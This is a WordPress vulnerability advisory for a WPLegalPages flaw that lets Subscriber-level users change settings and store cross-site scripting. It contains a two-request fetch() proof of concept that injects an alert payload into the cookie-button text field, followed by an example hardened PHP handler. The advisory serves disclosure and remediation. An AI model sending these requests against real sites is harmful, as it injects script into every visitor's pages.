wpvulndb | Krzysztof Zając | WPVDB-ID: 47DF802D-5200-484B-959C-9F569EDF992E
History: Jan 05, 2022 - 12:00 a.m.

WPLegalPages < 2.7.1 - Subscriber+ Arbitrary Settings Update to Stored XSS

2022-01-05 00:00:00
Krzysztof Zając
wpscan.com
6
wplegalpages
subscriber
arbitrary settings
stored xss
cross-site scripting

EPSS

0.001

Percentile

21.1%

The plugin does not check for authorisation and has flawed CSRF logic when saving its settings, allowing any authenticated user, such as a Subscriber, to update them. Furthermore, due to the lack of sanitisation and escaping, this could lead to Stored Cross-Site Scripting.

PoC

Run the below commands in the web developer console of the web browser when authenticated as any user:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": new URLSearchParams({ "action": "lp_save_admin_settings", "lp-cookie-bar": "ON" }),
  "method": "POST",
  "credentials": "include"
});
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": new URLSearchParams({ "action": "save_cookie_bar_form", "lp-cookie-button-text": "I agree');alert(/XSS/);//" }),
  "method": "POST",
  "credentials": "include"
});

The XSS will be triggered in all frontend pages.
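For contrast with the advisory above, the following shows how a WordPress admin-ajax settings handler of this kind is hardened against the three root causes named in the description (no authorisation check, bypassable CSRF logic, no sanitisation or escaping). This is example code added here, not WPLegalPages' own code or its actual fix; the function names, option name, nonce name and the manage_options capability are assumptions.

```php
<?php
// Hypothetical hardened admin-ajax handler for a settings form like the
// page's "save_cookie_bar_form". Editor-added example, not WPLegalPages'
// code or its actual fix; option name, nonce name and capability are assumed.

// Register only the authenticated hook (no wp_ajax_nopriv_ variant).
add_action( 'wp_ajax_save_cookie_bar_form', 'example_save_cookie_bar_form' );

function example_save_cookie_bar_form() {
    // Authorisation: being logged in (e.g. as a Subscriber) is not enough
    // to change site-wide settings; require an explicit capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // CSRF: check_ajax_referer() dies when the nonce field is missing or
    // invalid, so the check cannot be bypassed by simply omitting the field.
    // The admin page must pass wp_create_nonce( 'example_cookie_bar' ) as "nonce".
    check_ajax_referer( 'example_cookie_bar', 'nonce' );

    // Sanitise on input: plain text only for the button label, and an
    // explicit allow-list for the on/off toggle instead of the raw value.
    $button_text = isset( $_POST['lp-cookie-button-text'] )
        ? sanitize_text_field( wp_unslash( $_POST['lp-cookie-button-text'] ) )
        : '';
    $bar_enabled = ( isset( $_POST['lp-cookie-bar'] ) && 'ON' === $_POST['lp-cookie-bar'] )
        ? 'ON' : 'OFF';

    update_option( 'example_cookie_bar_settings', array(
        'enabled'     => $bar_enabled,
        'button_text' => $button_text,
    ) );
    wp_send_json_success();
}

// Escape on output for each context. Even if a stored value were
//   I agree');alert(/XSS/);//
// it is emitted as inert text, not executed, on the frontend pages.
function example_render_cookie_bar() {
    $s = get_option( 'example_cookie_bar_settings', array() );
    if ( empty( $s['enabled'] ) || 'ON' !== $s['enabled'] ) {
        return;
    }
    $text = isset( $s['button_text'] ) ? $s['button_text'] : 'I agree';
    echo '<button id="example-cookie-accept">' . esc_html( $text ) . '</button>';
    // JavaScript string context: wp_json_encode() produces a safely quoted literal.
    echo '<script>var exampleCookieLabel = ' . wp_json_encode( $text ) . ';</script>';
}
add_action( 'wp_footer', 'example_render_cookie_bar' );
```

The capability check rejects the Subscriber-level requests from the PoC outright, and the nonce check turns the second request into a failed CSRF attempt even for an administrator's browser.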

